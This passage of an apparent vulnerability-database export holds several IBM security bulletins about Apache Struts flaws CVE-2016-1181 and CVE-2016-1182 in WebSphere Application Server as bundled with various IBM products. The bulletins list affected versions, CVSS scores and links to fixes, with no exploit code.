Vulnerability Details\n\nPlease consult the security bulletin [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s) \n\n| Product and Version shipped as a component \n---|--- \nWebSphere Partner Gateway Advanced/Enterprise Edition 6.2.1.4| WebSphere Application Server 7.0 \nWebSphere Application Server 8.5.5 \n \n## ", "cvss3": {}, "published": "2018-06-16T20:02:09", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Partner Gateway Advanced/Enterprise Edition (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T20:02:09", "id": "AAE50909D8058934D5CCB989B4CEA17B72CABD2BC4CF08576581EC909FE087A7", "href": "https://www.ibm.com/support/pages/node/284941", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:51:14", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Tivoli Security Policy Manager. Information about security vulnerabilities affecting IBM WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nProduct Version\n\n| WebSphere version \n---|--- \nTivoli Security Policy Manager 7.1| WebSphere Application Server 7.0 \nWebSphere Application Server 8.0 \nTivoli Security Policy Manager 7.0| WebSphere Application Server 7.0 \n \n## Remediation/Fixes\n\nIBM Tivoli Security Policy Manager (TSPM) is affected through IBM WebSphere Application Server. If you are running TSPM with one of the affected versions of WebSphere, update your IBM WebSphere Application Server with the appropriate Interim Fix based on information in the WebSphere security bulletin ([Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>)).\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T21:46:38", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Tivoli Security Policy Manager (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T21:46:38", "id": "6F2C088BF5D78FB804760981ACFE38C9CC104BC5F9390812E5D324682512AD45", "href": "https://www.ibm.com/support/pages/node/552249", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:45:10", "description": "## Summary\n\nIBM WebSphere Application Server v7.0 is shipped as a component of IBM Integrated Information Core. Information about security vulnerabilities affecting IBM WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin: [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<www.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Integrated Information Core V1.5, V1.5.0.1 and V1.5.0.2| IBM WebSphere Application Server v7.0 \n \n## Remediation/Fixes\n\nDownload the correct version of the fix from the following link: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182). Installation instructions for the fix are included in the readme document that is in the fix package.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T22:28:33", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server that is shipped with IBM Integrated Information Core (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T22:28:33", "id": "EA4BC9A6E1BC28B39AE0C360DA599139777EC05EDFDC5120E91AC3051300D3E7", "href": "https://www.ibm.com/support/pages/node/284009", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:56:34", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Workload Deployer. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerabilities in Apache Struts afftects IBM WebSphere Application Server _](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Workload Deployer 3.1.0.7| IBM WebSphere Application Server 7.0.0.0 \nIBM WebSphere Application Server 8.0.0.0 \nIBM WebSphere Application Server 8.5.0.0 \nIBM WebSphere Application Server 8.5.5.0 \n \n## ", "cvss3": {}, "published": "2018-06-15T07:06:02", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts has been identified in IBM WebSphere Application Server shipped with IBM Workload Deployer (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:06:02", "id": "12780044E1A62D25F913723FBCBD5B926E91CC9AC8CA8FAA1DCE18D02D152689", "href": "https://www.ibm.com/support/pages/node/547901", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:39:08", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearQuest. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, ClearQuest CM Server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x:**\n\nThis vulnerability affects only the server component.\n\n**Versions 7.1.x.x:**\n\nNot affected.\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is shipped with IBM Rational ClearQuest. \n \n\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 8.0.0.x, 8.0.1.x, 9.0.0.x| IBM WebSphere Application Server versions 8.5.5 Full Profile, 8.5 Full Profile, 8.0, 7.0| [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www.ibm.com/support/docview.wss?uid=swg21985995>) \n \n**ClearQuest Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x \n8.0.1.x \n9.0.0.x| Apply the appropriate WebSphere Application Server fix directly to your CQ server host. No ClearQuest-specific steps are necessary. \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2020-02-04T16:40:40", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server that is shipped with IBM Rational ClearQuest (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2020-02-04T16:40:40", "id": "A4FDFC527D8A765D6247DDB806EE98612DA0FE7BCB4E133A742D7FA9A06E39DC", "href": "https://www.ibm.com/support/pages/node/284305", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:46:27", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Netcool/OMNIbus WebGUI. Information about a security vulnerability affecting eWAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nWebGUI 7.4.0 GA and FP| embedded Websphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T15:25:58", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in embedded IBM WebSphere Application Server shipped with Tivoli Netcool/OMNIbus WebGUI (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T15:25:58", "id": "F9A935F07F0C2592550406829A333AA17FFA9DE5B312BF55A008E03FEAC4C43E", "href": "https://www.ibm.com/support/pages/node/284185", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:38:48", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM Predictive Customer Intelligence. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nPredictive Customer Intelligence 1.0| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.0.1| WebSphere Application Server 8.5.5 ND \nPredictive Customer Intelligence 1.1| WebSphere Application Server 8.5.5.6 ND \nPredictive Customer Intelligence 1.1.1| WebSphere Application Server 8.5.5.6 ND \n \n## Remediation/Fixes\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nPredictive Customer Intelligence 1.0 and 1.0.1| WebSphere Application Server 8.5.5| [_Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \nPredictive Customer Intelligence 1.1 and 1.1.1| WebSphere Application Server 8.5.5.6| [_Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2020-02-11T21:31:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with Predictive Customer Intelligence (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2020-02-11T21:31:00", "id": "C270008C47088F4AB45570D101436BB116E08F304CC36AF51E0823C68AFCAAE8", "href": "https://www.ibm.com/support/pages/node/284795", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:46:35", "description": "## Summary\n\nWebSphere Application Server is shipped with IBM Tivoli System Automation Application Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli System Automation Application Manager 4.1| WebSphere Application Server 8.5 \nNote that IBM Tivoli System Automation Application Manager 3.2.2, 3.2.1, and 3.2.0 are not affected. \n\n## Remediation/Fixes\n\nYou need to install the corresponding APAR from WebSphere Application Server. Please follow the instructions on this link: [_http://www-01.ibm.com/support/docview.wss?uid=swg21985995_](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>). Please see section \u201cAffected Products and Versions\u201d in this bulletin on details which fix of WebSphere Application Server applies to your version of IBM Tivoli System Automation Application Manager.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {}, "published": "2018-06-17T15:25:57", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in WebSphere Application Server shipped with IBM Tivoli System Automation Application Manager (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T15:25:57", "id": "65DC12D6E8E0D53E6ED0AF1F356647C749F500509AAE6E4435FC95F00517F01C", "href": "https://www.ibm.com/support/pages/node/284137", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:48:03", "description": "## Summary\n\n \nIBM WebSphere Application Server is shipped as a component of IBM Content Manager Records Enabler. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n\n## Vulnerability Details\n\n \nPlease consult the security bulletin [_Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Content Manager Records Enabler 8.5, 8.5.0.1, 8.5.0.2, 8.5.0.3, 8.5.0.4, 8.5.0.5 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41 \n \nIBM Content Manager Records Enabler 8.5.0.6 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 \n \nIBM Content Manager Records Enabler 8.5.0.7 | \n\nIBM WebSphere Application Server V7.0.0.0 through 7.0.0.41, V8.0.0.0 through 8.0.0.12, V8.5.0.0 through 8.5.5.9 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:16:17", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Content Manager Records Enabler (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:16:17", "id": "FFF1402575E7BE1F32E231DF470BEDA94544D3C346FFE024F98E6A628264A23E", "href": "https://www.ibm.com/support/pages/node/284113", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-01T01:54:48", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM License Metric Tool and IBM Tivoli Asset Discovery for Distributed. \nInformation about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nCVEID: [CVE-2016-1181](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1181>) \nDESCRIPTION: Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113852> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \nCVEID: [CVE-2016-1182](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182>) \nDESCRIPTION: Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113853> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM License Metric Tool 7.5 \nIBM Tivoli Asset Discovery for Distributed 7.5 \n \nIBM License Metric Tool 7.2.2 \nIBM Tivoli Asset Discovery for Distributed 7.2.2| WebSphere Application Server 7 \n \n \nWebSphere Application Server 6.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server which is shipped with IBM License Metric Tool and IBM Tivoli Asset Discovery for Distributed. \n \n\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nIBM License Metric Tool 7.5 \nIBM Tivoli Asset Discovery for Distributed 7.5 \n| WebSphere Application Server 7.0 \n| [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nIBM License Metric Tool 7.2.2 \nIBM Tivoli Asset Discovery for Distributed 7.2.2| WebSphere Application Server 6.1| Please contact support for any potential fixes. \n \n## Workarounds and Mitigations\n\n**N/A**\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n[{\"Product\":{\"code\":\"SS8JFY\",\"label\":\"IBM License Metric Tool\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud &amp; Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.2.2;7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSHT5T\",\"label\":\"Tivoli Asset Discovery for Distributed\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"7.2.2;7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2021-04-26T21:17:25", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM License Metric Tool and IBM Tivoli Asset Discovery for Distributed (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2021-04-26T21:17:25", "id": "1815BD265DEB0EE550962E1526DA1FE75BACA3823A20A4BCDA8ED078F9EC9C8D", "href": "https://www.ibm.com/support/pages/node/550369", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:51:28", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Security Key Lifecycle Manager (SKLM). Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \n \nIBM Security Key Lifecycle Manager (SKLM) v2.5 on distributed platforms | WebSphere Application Server v8.5.5 \n \nIBM Security Key Lifecycle Manager (SKLM) v2.6 on distributed platforms | WebSphere Application Server v8.5.5.7 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T21:44:41", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T21:44:41", "id": "9E3B1F6158EF5703EF54F7C3064A7EB99BF9523B8A6CCF05475346791179C879", "href": "https://www.ibm.com/support/pages/node/547477", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:54:03", "description": "## Summary\n\nApache Struts vulnerabilities affect WebSphere Application Server and WebSphere Application Server Hypervisor Edition Administration Console. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: 